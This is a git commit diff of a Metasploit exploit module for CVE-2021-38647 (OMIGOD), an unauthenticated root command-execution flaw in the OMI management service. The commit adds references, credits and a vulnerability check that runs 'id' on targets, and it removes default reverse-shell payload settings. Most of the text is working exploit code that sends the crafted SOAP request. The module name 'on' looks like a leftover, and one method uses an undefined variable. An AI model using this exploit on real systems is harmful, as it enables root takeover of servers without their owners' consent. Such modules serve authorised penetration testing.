Update references and add a check method
This commit is contained in:
parent
e9582d1ddb
commit
33bacd2b20
|
@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::JavaDeserialization
|
||||
|
||||
XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze
|
||||
|
||||
|
@ -20,12 +19,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
info,
|
||||
'Name' => 'on',
|
||||
'Description' => %q{
|
||||
By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
|
||||
that will cause it to execute an operating system command as the root user.
|
||||
},
|
||||
'Author' => [
|
||||
'Spencer McIntyre',
|
||||
'wvu'
|
||||
'Nir Ohfeld', # vulnerability discovery & research
|
||||
'Shir Tamari', # vulnerability discovery & research
|
||||
'Spencer McIntyre', # metasploit module
|
||||
'wvu' # metasploit module
|
||||
],
|
||||
'References' => [
|
||||
%w[CVE 2021-38647],
|
||||
%w[URL https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647],
|
||||
%w[URL https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure],
|
||||
%w[URL https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/],
|
||||
%w[URL https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647]
|
||||
],
|
||||
'DisclosureDate' => '2021-09-14',
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -38,10 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Type' => :unix_cmd,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
|
||||
}
|
||||
'Type' => :unix_cmd
|
||||
}
|
||||
],
|
||||
[
|
||||
|
@ -49,17 +54,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Type' => :linux_dropper,
|
||||
'DefaultOptions' => {
|
||||
'CMDSTAGER::FLAVOR' => :curl,
|
||||
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
|
||||
}
|
||||
'Type' => :linux_dropper
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1,
|
||||
'DefaultOptions' => {
|
||||
'SSL' => true
|
||||
'RPORT' => 5985,
|
||||
'SSL' => false,
|
||||
'MeterpreterTryToFork' => true
|
||||
},
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -70,14 +73,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(5985),
|
||||
OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
# TODO: write this
|
||||
CheckCode::Vulnerable('hax hax hax')
|
||||
http_res = send_command('id')
|
||||
return CheckCode::Unknown if http_res.nil?
|
||||
return CheckCode::Safe unless http_res.code == 200
|
||||
|
||||
cmd_res = parse_response(http_res)
|
||||
return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
|
||||
|
||||
return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -97,8 +105,32 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def execute_command(cmd, _opts = {})
|
||||
vprint_status("Executing command: #{cmd}")
|
||||
res = send_command(cmd)
|
||||
|
||||
res = send_request_cgi(
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
parse_response(res)
|
||||
end
|
||||
|
||||
def parse_response(res)
|
||||
return nil unless res&.code == 200
|
||||
|
||||
return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
|
||||
unless return_code == 0
|
||||
print_error("Failed to execute command: #{cmd} (status: #{return_code})")
|
||||
end
|
||||
|
||||
{
|
||||
return_code: return_code,
|
||||
stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
|
||||
stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
|
||||
}
|
||||
end
|
||||
|
||||
def send_command(cmd)
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'ctype' => 'text/xml;charset=UTF-8',
|
||||
|
@ -112,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
</a:ReplyTo>
|
||||
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
|
||||
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
|
||||
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
|
||||
<a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
|
||||
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
|
||||
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
|
||||
|
@ -132,20 +164,5 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
</s:Envelope>
|
||||
ENVELOPE
|
||||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
|
||||
end
|
||||
|
||||
return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
|
||||
unless return_code == 0
|
||||
print_error("Failed to execute command: #{cmd} (status: #{return_code})")
|
||||
end
|
||||
|
||||
{
|
||||
return_code: return_code,
|
||||
stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
|
||||
stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
|
||||
}
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue